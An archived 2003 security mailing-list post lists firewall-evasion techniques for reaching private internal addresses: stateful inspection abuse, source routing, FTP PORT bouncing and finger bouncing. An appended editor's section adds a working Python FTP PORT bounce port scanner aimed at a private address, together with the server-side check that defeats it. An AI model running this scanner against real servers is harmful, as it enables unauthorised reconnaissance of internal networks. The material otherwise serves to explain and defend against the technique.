Re: internal IP address revealed by e-mail

From: Chris McNab (chris.mcnab@trustmatta.com)
Date: Tue Apr 29 2003 - 15:00:00 EDT


Hey,

There aren't any situations I can think of where you can run firewalk
against non-routable private addresses from the Internet. Your best bets at
the network level are the following:

1) Abuse stateful inspection problems (see Lopatic, Song & McDonald's
Blackhat 2000 presentation on this):

  - using malformed FTP PORT or PASV commands against accessible FTP servers
to punch holes through the firewall to other addresses and hosts
  - using FWZ encapsulation against older Checkpoint devices

2) Use malformed IP source routing options in your packets to try and route
packets to internal addresses, although this requires some investigation and
testing. A good tool is Todd MacDermid's lsrscan (www.synacklabs.net).

Standard application-level stuff includes exploiting a known vulnerability
to gain internal network access. There are many different ways to do this,
depending on which vulnerable services or applications you find; my
favorites are:

  - FTP PORT bouncing
  - finger redirection & bouncing

If the addresses are private, it's always going to be a pain talking to them
across the Internet, even more so if firewalls and proxies are in place. I'm
putting together a lengthy paper about these kinds of advanced techniques,
and will let the list know in due course.

Regards,

Chris

Chris McNab
Technical Director

Matta Security Limited
18 Noel Street
London W1F 8GN

Tel: 0870 077 1100
Mob: 0788 626 0878

This e-mail was sent from Matta Security Limited. The information contained
in this message is confidential, may be privileged, and is intended for the
addressee(s) only. If you have received this message in error please notify
the originator immediately. The unauthorised use, disclosure, copying or
alteration of this message is strictly forbidden. Matta Security Limited
does not warrant that any attachments are free from viruses or other
defects. Matta Security Limited will not be liable for direct, special,
indirect or consequential damages arising from alteration of the contents of
this message by a third party or as a result of any virus being passed on.
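Editor's added example, not part of Chris McNab's message above: the FTP PORT
bounce he lists is the classic way to reach an internal address through an FTP
server the firewall lets you talk to. The script below shows both sides of it.
The attacker side builds the six-byte PORT argument pointing at an internal
address, issues LIST, and reads the server's reply to tell whether the internal
port accepted the data connection; the defender side is the check an FTP server
should apply to every PORT command (data connection only back to the control
connection's peer, and only to an unprivileged port). All hosts, credentials and
reply strings are constructed for illustration; nothing here is tied to a real
server.

```python
"""FTP PORT bounce: attacker-side scan and the server-side check that stops it.

Added example; hosts, credentials and sample replies are constructed.
"""
import ftplib
import ipaddress
import re
from typing import Dict, Iterable, Tuple

PORT_ARG_RE = re.compile(r"^(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})$")


def build_port_argument(ip: str, port: int) -> str:
    """Encode ip:port in the h1,h2,h3,h4,p1,p2 form PORT takes (RFC 959)."""
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ",".join(octets + [str(port >> 8), str(port & 0xFF)])


def parse_port_argument(arg: str) -> Tuple[str, int]:
    """Decode a PORT argument; anything but six decimal bytes is rejected."""
    m = PORT_ARG_RE.match(arg.strip())
    if not m:
        raise ValueError("malformed PORT argument")
    nums = [int(x) for x in m.groups()]
    if any(n > 255 for n in nums):
        raise ValueError("byte out of range")
    return ".".join(map(str, nums[:4])), (nums[4] << 8) | nums[5]


def should_reject_port(control_peer_ip: str, port_arg: str) -> bool:
    """Server-side bounce defence: the data connection may only go back to the
    client that owns the control connection, and only to a port >= 1024.
    True means the server should answer 500/501 instead of 200."""
    try:
        target_ip, target_port = parse_port_argument(port_arg)
    except ValueError:
        return True
    if ipaddress.IPv4Address(target_ip) != ipaddress.IPv4Address(control_peer_ip):
        return True
    return target_port < 1024


def classify_bounce_reply(reply: str) -> str:
    """Interpret the final reply to LIST after a redirected PORT.
    A server that honours the bounce reports 150/125 then 226 when the internal
    port accepted its connection, and 425 when the connection was refused."""
    code = reply[:3]
    if code in ("150", "125", "226"):
        return "open"
    if code == "425":
        return "closed"
    if code in ("500", "501", "502", "550"):
        return "bounce-rejected"
    return "unknown"


def bounce_scan(ftp_host: str, user: str, password: str, target_ip: str,
                ports: Iterable[int], timeout: int = 10) -> Dict[int, str]:
    """Port-scan target_ip from the FTP server's vantage point: every probe asks
    the server to open its data connection to target_ip:port, then LIST forces
    the attempt and the reply tells us how it went."""
    results: Dict[int, str] = {}
    ftp = ftplib.FTP()
    ftp.connect(ftp_host, 21, timeout=timeout)
    ftp.login(user, password)
    for port in ports:
        try:
            ftp.sendcmd("PORT " + build_port_argument(target_ip, port))
        except ftplib.error_perm as exc:           # 5xx: server refused the bounce
            results[port] = classify_bounce_reply(str(exc))
            continue
        try:
            reply = ftp.sendcmd("LIST")
            if reply.startswith("1"):
                # Preliminary 150: the final 226/425 arrives once the data
                # connection finishes, so read it too to keep the session in sync.
                reply = ftp.getresp()
        except (ftplib.error_temp, ftplib.error_perm) as exc:
            reply = str(exc)                        # 425 (refused) or 5xx
        results[port] = classify_bounce_reply(reply)
    ftp.quit()
    return results


if __name__ == "__main__":
    # Constructed invocation: an Internet-reachable FTP server with anonymous
    # login is asked to probe a private address behind the same firewall.
    print(bounce_scan("ftp.example.test", "anonymous", "pen@test",
                      "10.0.0.5", [22, 25, 80, 139]))
```

The scan only works against servers that still honour a PORT address other
than the control connection's peer, which is exactly what `should_reject_port`
refuses; a "bounce-rejected" result across all ports means the server is
patched and the technique is not available from that vantage point.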

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:32 EDT